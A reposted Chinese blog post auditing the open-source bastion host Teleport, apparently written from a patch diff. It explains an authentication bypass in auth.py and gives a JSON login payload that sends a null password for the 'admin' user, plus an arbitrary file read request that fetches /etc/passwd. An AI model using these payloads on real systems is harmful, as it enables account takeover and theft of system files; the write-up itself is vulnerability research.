开源堡垒机teleport任意用户登录漏洞审计

渗透技巧 2年前 (2023) admin
481 0 0


声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

0X00 任意用户登录分析


拿到更新包进行对比首先更新包更新了两个文件

开源堡垒机teleport任意用户登录漏洞审计

对比auth.py

开源堡垒机teleport任意用户登录漏洞审计两个地方。一个是elif 改成了if 然后是检测了密码是否存在。那么跟进去代码看看login 的逻辑开源堡垒机teleport任意用户登录漏洞审计只要password 为None 那么就可以跳过密码验证。让password 为None 就直接用 json.dumps开源堡垒机teleport任意用户登录漏洞审计pyaload 如下:

{
"type":2,
"username":"admin",
"password":null,
"captcha":"rhcl",
"oath":"",
"remember":false
}


0X01 任意文件读取

开源堡垒机teleport任意用户登录漏洞审计

payload如下:

/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0

作者:print(“”)

原文地址:https://www.o2oxy.cn/4132.html

关 注 有 礼



关注本公众号回复“718619
可以免费领取全套网络安全学习教程,安全靶场、面试指南、安全沙龙PPT、代码安全、火眼安全系统等

开源堡垒机teleport任意用户登录漏洞审计 还在等什么?赶紧点击下方名片关注学习吧!



原文始发于微信公众号(渗透测试网络安全):开源堡垒机teleport任意用户登录漏洞审计

版权声明:admin 发表于 2023年4月15日 下午4:13。
转载请注明:开源堡垒机teleport任意用户登录漏洞审计 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...